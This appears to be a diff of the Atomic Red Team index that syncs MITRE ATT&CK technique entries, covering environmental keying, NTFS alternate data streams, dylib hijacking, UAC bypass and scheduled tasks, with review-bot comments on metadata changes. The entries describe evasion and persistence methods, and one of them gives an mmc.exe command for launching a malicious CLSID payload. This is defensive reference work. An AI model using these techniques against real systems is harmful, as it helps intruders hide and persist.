Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.
Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-04T14:52:51.290Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Environmental Keying
x_mitre_detection: Detecting the use of environmental keying may be difficult
@@ -17784,11 +18067,10 @@ defense-evasion:
- Static File Analysis
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564.004:
technique:
- modified: '2024-02-14T21:56:34.831Z'
+ modified: '2024-09-12T15:27:29.615Z'
name: 'Hide Artifacts: NTFS File Attributes'
description: |-
Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)
@@ -17855,8 +18137,8 @@ defense-evasion:
Retrieved March 21, 2018.
url: https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/
- source_name: Microsoft File Streams
- description: Microsoft. (n.d.). File Streams. Retrieved December 2, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa364404
+ description: Microsoft. (n.d.). File Streams. Retrieved September 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/fileio/file-streams
- source_name: Oddvar Moe ADS2 Apr 2018
description: Moe, O. (2018, April 11). Putting Data in Alternate Data Streams
and How to Execute It - Part 2. Retrieved June 30, 2018.
@@ -17874,7 +18156,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.004
atomic_tests: []
T1055.001:
@@ -17977,12 +18258,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.001
atomic_tests: []
T1556:
technique:
- modified: '2024-04-11T21:51:44.851Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Modify Authentication Process
description: |-
Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -17995,6 +18275,7 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Chris Ross @xorrior
x_mitre_deprecated: false
@@ -18031,17 +18312,17 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- Network
- - Azure AD
- - Google Workspace
- IaaS
- - Office 365
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Process: Process Access'
@@ -18087,9 +18368,6 @@ defense-evasion:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1216:
technique:
@@ -18127,7 +18405,7 @@ defense-evasion:
behavior may be abused by adversaries to execute malicious files that could
bypass application control and signature validation on systems.(Citation:
GitHub Ultimate AppLocker Bypass List)'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-18T14:43:46.045Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Signed Script Proxy Execution
x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -18146,7 +18424,6 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1216
atomic_tests: []
T1556.004:
@@ -18177,7 +18454,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-12-14T23:14:26.107Z'
name: Network Device Authentication
description: |-
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -18201,12 +18478,10 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.004:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:39.601Z'
name: Dylib Hijacking
description: |-
Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath
, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB
function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -18290,7 +18565,6 @@ defense-evasion:
url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1601.002:
technique:
@@ -18312,7 +18586,7 @@ defense-evasion:
url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
IOS devices. Retrieved October 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T17:49:02.660Z'
name: Downgrade System Image
description: "Adversaries may install an older version of the operating system
of a network device to weaken security. Older operating system versions on
@@ -18346,12 +18620,10 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -18403,9 +18675,8 @@ defense-evasion:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests:
- name: Create local account (Linux)
@@ -18588,7 +18859,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1127:
technique:
@@ -18635,7 +18905,7 @@ defense-evasion:
legitimate certificates that allow them to execute on a system and proxy execution
of malicious code through a trusted process that effectively bypasses application
control solutions.'
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:00:37.443Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Trusted Developer Utilities Proxy Execution
x_mitre_detection: |-
@@ -18648,12 +18918,13 @@ defense-evasion:
x_mitre_is_subtechnique: false
x_mitre_data_sources:
- 'Command: Command Execution'
+ - 'Module: Module Load'
+ - 'Process: Process Metadata'
- 'Process: Process Creation'
x_mitre_defense_bypassed:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1127
atomic_tests: []
T1218.014:
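Review bot: Two data sources (`Module: Module Load`, `Process: Process Metadata`) are added to T1127 here while the preceding hunk moves its `modified` back from `2022-05-24T14:00:00.188Z` to `2022-05-05T05:00:37.443Z` and `x_mitre_attack_spec_version` stays at `2.1.0`. A content change paired with an older modification stamp means the previous index was not a faithful copy of the source object, or the source bundle itself changed, so this is not a pure re-serialization; a sentence in the commit message explaining which it is would help, and `x_mitre_version` for T1127, which is outside the hunk, should be checked against the upstream bundle.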
@@ -18732,7 +19003,7 @@ defense-evasion:
mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious
CLSID payload with the following command: mmc.exe -Embedding C:\\path\\to\\test.msc
.(Citation:
abusing_com_reg)"
- modified: '2022-10-25T14:00:00.188Z'
+ modified: '2022-05-20T17:41:16.112Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: MMC
x_mitre_detection: "Monitor processes and command-line parameters for suspicious
@@ -18754,7 +19025,6 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564.010:
technique:
@@ -18797,7 +19067,7 @@ defense-evasion:
url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-11-29T15:56:50.370Z'
name: Process Argument Spoofing
description: |-
Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.(Citation: Microsoft PEB 2021)(Citation: Xpn Argue Like Cobalt 2019)
@@ -18821,8 +19091,6 @@ defense-evasion:
- 'Process: Process Creation'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.012:
technique:
@@ -18870,7 +19138,7 @@ defense-evasion:
url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
Profilers. Retrieved June 24, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T21:35:12.049Z'
name: 'Hijack Execution Flow: COR_PROFILER'
description: |-
Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -18908,8 +19176,6 @@ defense-evasion:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1574.012
atomic_tests: []
privilege-escalation:
@@ -18958,7 +19224,7 @@ privilege-escalation:
description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
16, 2017.
source_name: Microsoft SendNotifyMessage function
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.004Z'
name: 'Process Injection: Extra Window Memory Injection'
description: "Adversaries may inject malicious code into process via Extra Window
Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -19010,29 +19276,28 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.011
atomic_tests: []
T1053.005:
technique:
- modified: '2023-11-15T14:33:53.354Z'
+ modified: '2024-10-13T16:13:47.770Z'
name: 'Scheduled Task/Job: Scheduled Task'
description: "Adversaries may abuse the Windows Task Scheduler to perform task
scheduling for initial or recurring execution of malicious code. There are
multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
utility can be run directly on the command line, or the Task Scheduler can
be opened through the GUI within the Administrator Tools section of the Control
- Panel. In some cases, adversaries have used a .NET wrapper for the Windows
- Task Scheduler, and alternatively, adversaries have used the Windows netapi32
- library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
- utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
- though at.exe
can not access tasks created with schtasks
- or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
- programs at system startup or on a scheduled basis for persistence. The Windows
- Task Scheduler can also be abused to conduct remote Execution as part of Lateral
- Movement and/or to run a process under the context of a specified account
- (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+ Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+ wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+ used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+ Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+ create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+ Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+ system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+ can also be abused to conduct remote Execution as part of Lateral Movement
+ and/or to run a process under the context of a specified account (such as
+ SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
adversaries have also abused the Windows Task Scheduler to potentially mask
one-time execution under signed/trusted system processes.(Citation: ProofPoint
Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
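Review bot: the new description text in this hunk is upstream ATT&CK prose, so the two wording problems in it should be raised upstream rather than hand-patched in this generated file: `Powershell Cmdlet` should read `PowerShell cmdlet`, and `create a scheduled task via an XML path` is ambiguous about whether the cmdlet is handed a file path or the task XML itself. Also note that `(Citation: Stack Overflow)` and `(Citation: Red Canary - Atomic Red Team)` are referenced here but their reference entries only land in separate hunks further down; if this hunk is ever applied on its own the citation keys will dangle.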
@@ -19079,7 +19344,7 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
@@ -19111,8 +19376,8 @@ privilege-escalation:
url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Tarrask scheduled task
description: Microsoft Threat Intelligence Team & Detection and Response Team
. (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -19126,6 +19391,10 @@ privilege-escalation:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Red Canary - Atomic Red Team
+ description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+ Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+ url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
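Review bot: the `Red Canary - Atomic Red Team` entry added here makes the upstream description cite this repository's own `atomics/T1053.005/T1053.005.md` as the source for the `Invoke-CimMethod` / `PS_ScheduledTask` sentence. From this repo's point of view that is a circular reference, so nobody should read the synced description as independent corroboration of the atomic test. The `blob/master/...` URL will also break if the test file is renamed or moved; suggesting upstream pin it to a commit would make it durable.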
@@ -19138,11 +19407,14 @@ privilege-escalation:
description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
Task - Registry. Retrieved June 1, 2022.
url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+ - source_name: Stack Overflow
+ description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+ Tasks folder. Retrieved June 19, 2024.
+ url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.005
atomic_tests: []
T1037:
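Review bot: `spec_version: '2.1'` is dropped from T1053.005 here and from nearly every other object in this patch with nothing added in its place. Confirm this is a deliberate change in the sync tool (STIX `spec_version` no longer emitted) rather than a serialization regression, and that no consumer of this YAML reads that key. `x_mitre_attack_spec_version` is kept, so the ATT&CK data-model version is still recoverable per object.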
@@ -19208,7 +19480,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.007:
technique:
@@ -19297,7 +19568,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.013:
technique:
@@ -19385,7 +19655,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.013
atomic_tests: []
T1543:
@@ -19470,7 +19739,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.006:
technique:
@@ -19502,7 +19770,7 @@ privilege-escalation:
Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:08:21.101Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: LC_LOAD_DYLIB Addition
x_mitre_detection: Monitor processes for those that may be used to modify binary
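Review bot: `modified` moves backwards here, from `2022-05-11T14:00:00.188Z` to `2022-04-20T17:08:21.101Z`, and the same happens below for T1548.002, T1548.003, T1547.014, T1055.003 and T1546.011. The old values look like release-batch timestamps and the new ones like the objects' real STIX `modified` fields, which is an improvement, but anything that compares `modified` to decide whether an object is newer will now see these as older than what it last processed. Call this out in the commit message so it is not chased later as a data regression.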
@@ -19525,11 +19793,10 @@ privilege-escalation:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053.007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:26:03.731Z'
name: Kubernetes Cronjob
description: |-
Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -19587,14 +19854,13 @@ privilege-escalation:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.007
atomic_tests: []
T1548.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:35:39.112Z'
name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
description: |-
Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -19695,7 +19961,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.002
atomic_tests: []
T1548.003:
@@ -19726,7 +19991,7 @@ privilege-escalation:
description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
Does. Retrieved March 19, 2018.
source_name: cybereason osx proton
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-14T16:28:19.781Z'
name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
description: |-
Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -19760,8 +20025,6 @@ privilege-escalation:
- User
x_mitre_effective_permissions:
- root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1548.003
atomic_tests:
- name: Sudo usage
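Review bot: this hunk removes both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` from T1548.003, and nothing in the visible lines restores an `x_mitre_attack_spec_version`. Elsewhere in the patch (T1574.011, T1053.003) the same removal is only a key reorder and `x_mitre_attack_spec_version: 3.2.0` reappears later in the object; T1055.003 and T1546.011 further down show the same bare removal as this one. Check whether these three objects now carry no spec version at all, or whether the re-added key just falls outside the hunk context.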
@@ -19879,7 +20142,7 @@ privilege-escalation:
sudo visudo -c -f /usr/local/etc/sudoers
T1574.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:42:48.016Z'
name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
description: |-
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -19898,7 +20161,6 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Matthew Demaske, Adaptforward
@@ -19912,7 +20174,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -19939,8 +20200,8 @@ privilege-escalation:
external_id: T1574.011
- source_name: Tweet Registry Perms Weakness
description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
- April 9, 2018."
- url: https://twitter.com/r0wdy_/status/936365549553991680
+ September 12, 2024."
+ url: https://x.com/r0wdy_/status/936365549553991680
- source_name: insecure_reg_perms
description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -19971,12 +20232,13 @@ privilege-escalation:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.011
atomic_tests: []
T1547:
technique:
- modified: '2024-04-16T12:26:07.945Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: Boot or Logon Autostart Execution
description: |-
Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
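Review bot: the `x_mitre_attack_spec_version: 2.1.0` and `x_mitre_modified_by_ref` deletions earlier in the T1574.011 object are re-added here at the end of the object, so the net change for that technique is `2.1.0` -> `3.2.0` plus a key reorder. The reorder is what makes this diff hard to review; if the generator can emit keys in a fixed order, future syncs become a one-line diff per object. The T1547 `modified` bump at the bottom of this hunk has no accompanying content change in the visible lines, so the changed text is presumably further down in that object.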
@@ -20048,9 +20310,9 @@ privilege-escalation:
2017.
url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Microsoft TimeProvider
description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -20066,12 +20328,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547
atomic_tests: []
T1547.014:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-22T14:17:17.353Z'
name: Active Setup
description: |-
